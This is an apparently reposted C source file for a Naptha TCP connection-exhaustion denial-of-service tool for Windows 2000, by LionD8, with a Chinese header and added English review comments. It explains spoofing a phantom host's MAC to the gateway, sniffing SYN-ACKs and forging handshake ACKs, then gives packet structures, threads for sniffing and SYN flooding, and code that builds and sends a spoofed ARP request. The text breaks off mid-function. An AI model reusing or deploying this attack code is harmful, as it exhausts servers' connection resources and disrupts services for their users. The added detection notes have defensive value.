
NAPTHA攻击方式在2K下的简单实现

作者:未知  来源:supcode.com收集整理  发布时间:2005-7-1 14:50:57

NAPTHA攻击方式在2K下的简单实现

/*            

  作者:LionD8
  EMAIL:liond8@eyou.com
  出处:https://www.xfocus.net/bbs/index.php?act=SE&f=3&t=33339&p=117598

  我的窝:http://liond8.126.com
  2004.2.16 凌晨


  简单原理:
  1.欺骗网关,让网关知道幻影主机的MAC.
  2.嗅探局域网中的所有数据包,判断是不是返回给幻影主机的
  第2次握手的数据包。如果是,就伪造第3次握手.
  3.发送伪造的SYN报文.
  
  通过消耗对方维护连接的资源(占用连接通道等)进行DoS。

  详细原理请见Warning3老大整理的 《新型网络DoS(拒绝服务)攻击漏洞 - "Naptha"》
  我就不废话了。
  地址: http://www.nsfocus.net/index.php?act=magazine&do=view&mid=721

*/

///////////////////////////////////////////////////
//以下代码在2K VC6.0下编译通过
//在虚拟机上测试,2k系统似乎正如《新型网络DoS(拒绝服务)攻击漏洞 - "Naptha"》
//所说,不受什么影响.
///////////////////////////////////////////////////


#include "stdio.h"
#include "Packet32.h"
#include "windows.h"
#include <ws2tcpip.h>
#include "winsock2.h"
#include "wchar.h"

/*
 * EtherType and ARP constants, written in host byte order. The visible
 * code passes EPT_ARP, ARP_HARDWARE and EPT_IP through htons() before
 * storing them in a frame. ARP_REQUEST and ARP_REPLY are not referenced in
 * the visible part of the file (the opcode is set with a literal 1 there).
 */
#define        EPT_IP            0x0800          /* EtherType: IPv4 */
#define        EPT_ARP            0x0806          /* EtherType: ARP */
#define        ARP_HARDWARE    0x0001            /* ARP hardware type: Ethernet */
#define        ARP_REQUEST        0x0001          /* ARP opcode: request */
#define        ARP_REPLY        0x0002          /* ARP opcode: reply */

/* NOTE(review): not used in the visible part; presumably passed to the
 * capture driver's filter setting later in the file - confirm. */
#define NDIS_PACKET_TYPE_PROMISCUOUS 0x0020 // promiscuous mode

#pragma comment(lib, "packet.lib")
#pragma comment(lib, "ws2_32.lib")

#pragma pack(push, 1)

/*
 * Ethernet II frame header (14 bytes). Declared inside the
 * #pragma pack(push, 1) region, so the compiler inserts no padding.
 */
typedef struct ehhdr
{
    UCHAR    eh_dst[6];      /* destination MAC address */
    UCHAR    eh_src[6];      /* source MAC address */
    USHORT   eh_type;        /* EtherType; the visible code stores it via htons() */
}EHHEADR, *PEHHEADR;

/*
 * ARP payload for Ethernet/IPv4 (28 bytes, assuming a 4-byte ULONG as on
 * Win32). The enclosing #pragma pack(push, 1) is required here: arp_spa
 * sits at offset 14, so default alignment would insert padding before it
 * and the struct would no longer match the on-wire layout.
 */
typedef struct arphdr
{
    USHORT    arp_hrd;          /* hardware type */
    USHORT    arp_pro;          /* protocol type */
    UCHAR     arp_hln;          /* hardware address length (the visible code sets 6) */
    UCHAR     arp_pln;          /* protocol address length (the visible code sets 4) */
    USHORT    arp_op;           /* opcode */
    UCHAR     arp_sha[6];       /* sender hardware (MAC) address */
    ULONG     arp_spa;          /* sender IPv4 address; filled from inet_addr() in the visible code */
    UCHAR     arp_tha[6];       /* target hardware (MAC) address */
    ULONG     arp_tpa;          /* target IPv4 address; filled from inet_addr() in the visible code */
}ARPHEADR, *PARPHEADR;

/*
 * Complete ARP frame: Ethernet header immediately followed by the ARP
 * payload (14 + 28 = 42 bytes under pack(1)). The visible sender copies
 * this struct into a zeroed buffer and hands the driver a length of 60,
 * i.e. the frame is zero-padded up to the minimum Ethernet size without FCS.
 */
typedef struct arpPacket
{
    EHHEADR    ehhdr;     /* link-layer header */
    ARPHEADR   arphdr;    /* ARP body */
} ARPPACKET, *PARPPACKET;

#pragma pack(pop)

/*
 * IPv4 header without options; field order and widths match the 20-byte
 * header layout of RFC 791.
 * NOTE(review): this struct is declared after #pragma pack(pop), so it is
 * not packed. Every member is naturally aligned, so no padding is expected
 * with a 4-byte unsigned int, but nothing in the file enforces the size.
 */
typedef struct ip_head      
{
unsigned char h_verlen;         /* version (high nibble) and header length in 32-bit words (low nibble) */
unsigned char tos;              /* type of service */
unsigned short total_len;       /* total datagram length */
unsigned short ident;           /* identification */
unsigned short frag_and_flags;  /* flags and fragment offset */
unsigned char ttl;              /* time to live */
unsigned char proto;            /* upper-layer protocol number */
unsigned short checksum;        /* header checksum */
unsigned int sourceIP;          /* source address */
unsigned int destIP;            /* destination address */
}IPHEADER;


/*
 * TCP header without options; field order and widths match the 20-byte
 * fixed TCP header (RFC 793).
 * NOTE(review): declared outside the pack(1) region; members are naturally
 * aligned, so no padding is expected, but the size is not asserted anywhere.
 */
typedef struct tcp_head  
{
USHORT th_sport;            /* source port */
USHORT th_dport;            /* destination port */
unsigned int th_seq;        /* sequence number */
unsigned int th_ack;        /* acknowledgment number */
unsigned char th_lenres;    /* data offset (high nibble) and reserved bits */
unsigned char th_flag;      /* control flags (SYN, ACK, ...) */
USHORT th_win;              /* window size */
USHORT th_sum;              /* checksum */
USHORT th_urp;              /* urgent pointer */
}TCPHEADER;

/*
 * TCP pseudo-header (source, destination, zero byte, protocol, TCP length),
 * the 12-byte prefix that enters the TCP checksum computation.
 * NOTE(review): its use is not visible in this part of the file; presumably
 * it is fed to checksum() - confirm.
 * NOTE(review): the address fields are unsigned long, which is 4 bytes on
 * Win32; on a platform with an 8-byte long the layout would no longer be
 * the 12-byte pseudo-header.
 */
typedef struct tsd_hdr  
{
unsigned long saddr;    /* source IPv4 address */
unsigned long daddr;    /* destination IPv4 address */
char mbz;               /* must be zero */
char ptcl;              /* protocol number */
unsigned short tcpl;    /* TCP segment length */
}PSDHEADER;


/*
 * Forward declarations. Only the opening part of ThreadArpSnoop is visible
 * in this portion of the file; the roles noted for the other functions are
 * inferred from their names and the file's header comment and should be
 * confirmed against their bodies.
 */
DWORD  WINAPI  ThreadArpSnoop(LPVOID lp);          /* thread: selects an adapter and sends the ARP request for the phantom host */
USHORT checksum(USHORT *buffer, int size);         /* presumably the 16-bit Internet checksum - confirm */
DWORD  WINAPI  ThreadSynFlood(LPVOID lp);          /* thread: presumably emits the SYN segments - confirm */
DWORD  WINAPI    SnifferSynAck(LPVOID lp);         /* thread: presumably captures SYN/ACK replies - confirm */
void    SendAck ( DWORD    SEQ , DWORD    ACK ,USHORT    SPort);   /* presumably builds the third-handshake ACK - confirm */
void    AnalyseData    (LPPACKET lpPacket);        /* presumably parses one captured packet buffer - confirm */


/*
 * Compile-time configuration and shared state. Every address below is an
 * RFC 1918 private address.
 *
 * Detection note: SMacAddr has the group (I/G) bit set in its first octet
 * (0xFF), which a legitimate unicast source address never has, so an
 * Ethernet source or ARP sender field carrying it is an anomaly worth
 * alerting on. Switch-side ARP inspection and per-port MAC limits are the
 * usual controls against unsolicited IP-to-MAC bindings of this kind.
 */
#define        ATPORT    80                    // target TCP port
#define        ATIP    "192.168.1.1"        // target IP address
#define        GATE    "192.168.85.1"        // gateway IP address (target of the ARP request built in ThreadArpSnoop)
#define        SNOOPIP    "192.168.85.250"    // IP address claimed for the phantom host
#define        SLEEPTIME    1000            // NOTE(review): unused in the visible part; presumably a delay in ms - confirm
UCHAR    DMacAddr[6]={0xFF,0xFF,0xFF,0xFF,0xFF,0xFF}; // Ethernet broadcast address
UCHAR    SMacAddr[6]={0xFF,0xFF,0xFF,0xFF,0xFF,0xFE}; // MAC address claimed for the phantom host

// Start-up handshake flag shared between main() and the worker threads.
// NOTE(review): plain BOOL, read and written from several threads without
// volatile or Interlocked access.
BOOL  IsGoOn = TRUE;

/*
 * Entry point: starts the three worker threads one after another, using
 * the global IsGoOn flag as a start-up handshake, then parks forever.
 *
 * According to the file's header comment the combined effect on the peer is
 * a series of completed handshakes from an address that never sends data,
 * which is why per-source connection limits and idle timeouts on the
 * listener are the relevant server-side controls.
 *
 * NOTE(review): "void main()" is non-standard; NULL is passed for the
 * integer stack-size and creation-flags parameters of CreateThread
 * (equivalent to 0), and the returned thread handles are discarded.
 */
void main()
{

    /* Cleared so the spin loop below blocks until the ARP thread signals. */
    IsGoOn = FALSE;
    CreateThread(NULL,NULL,ThreadArpSnoop,NULL,NULL,NULL);

    /*
     * ThreadArpSnoop sets IsGoOn to TRUE once the adapter number typed on
     * the console has passed its range check (before the adapter is opened).
     * NOTE(review): that thread returns without setting the flag when
     * adapter enumeration fails or the number is rejected, in which case
     * this loop never exits.
     */
    while ( !IsGoOn )
        Sleep(1);
    /* Re-arm the flag for the second thread. */
    IsGoOn = FALSE;
    CreateThread(NULL,NULL,SnifferSynAck,NULL,NULL,NULL);
    /* Presumably SnifferSynAck sets IsGoOn when it is ready; its body is
     * not visible in this part of the file - confirm. */
    while ( !IsGoOn )
        Sleep(1);
    CreateThread(NULL,NULL,ThreadSynFlood,NULL,NULL,NULL);

    /* Keep the process alive; there is no shutdown path. */
    while (1)
    Sleep(1000000);


}

DWORD  WINAPI  ThreadArpSnoop(LPVOID lp)
{
    static CHAR  AdapterList[10][1024];    
    TCHAR          szPacketBuf[512];
    LPADAPTER    lpAdapter;
    LPPACKET     lpPacket;
    WCHAR        AdapterName[2048];
    WCHAR        *temp,*temp1;
    ARPPACKET    ARPPacket;
    ULONG         AdapterLength = 1024;
    DWORD         AdapterNum = 0;
    DWORD         nRetCode, i;

    if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)
    {
        printf("Unable to retrieve the list of the adapters!\n");
        return 0;
    }
    temp = AdapterName;
    temp1=AdapterName;
    i = 0;
    while ((*temp != '\0')||(*(temp-1) != '\0'))
    {
        if (*temp == '\0')
        {
            memcpy(AdapterList[i],temp1,(temp-temp1)*sizeof(WCHAR));
            temp1=temp+1;
            i++;
        }
        temp++;
    }
    AdapterNum = i;
    for (i = 0; i < AdapterNum; i++)
    wprintf(L"\n%d- %s\n", i+1, AdapterList[i]);
    printf("\nPlease select adapter number:");
    scanf("%d",&i);        
    if(i>AdapterNum)
    {
        printf("\nInput Number error!");
        return 0;
    }

    IsGoOn = TRUE;
    lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[i-1]);    
    if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
    {
        nRetCode = GetLastError();
        printf("Unable to open the driver, Error Code : %lx\n", nRetCode);
        return 0;
    }

    lpPacket = PacketAllocatePacket();
    if(lpPacket == NULL)
    {
        printf("\nError:failed to allocate the LPPACKET structure.");
        return 0;
    }
    memset(szPacketBuf, 0, sizeof(szPacketBuf));    
    memcpy(ARPPacket.ehhdr.eh_dst, DMacAddr, 6);                 
    memcpy(ARPPacket.ehhdr.eh_src, SMacAddr, 6);    
    ARPPacket.ehhdr.eh_type  = htons(EPT_ARP);        
    ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);
    ARPPacket.arphdr.arp_pro = htons(EPT_IP);    
    ARPPacket.arphdr.arp_hln = 6;                    
    ARPPacket.arphdr.arp_pln = 4;
    ARPPacket.arphdr.arp_op = htons(1);        
    memcpy(ARPPacket.arphdr.arp_sha, SMacAddr, 6);  
    ARPPacket.arphdr.arp_spa = inet_addr(SNOOPIP);          
    memset(ARPPacket.arphdr.arp_tha,0,6);            
    ARPPacket.arphdr.arp_tpa = inet_addr(GATE);     
    memcpy(szPacketBuf, (char*)&ARPPacket, sizeof(ARPPacket));    
    PacketInitPacket(lpPacket, szPacketBuf, 60);
    
    if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
    {
        printf("warning: Unable to send more than one packet in a single write!\n");
    }
    while ( 1 )
    {
        if(PacketSendPacket(lpAdapter,
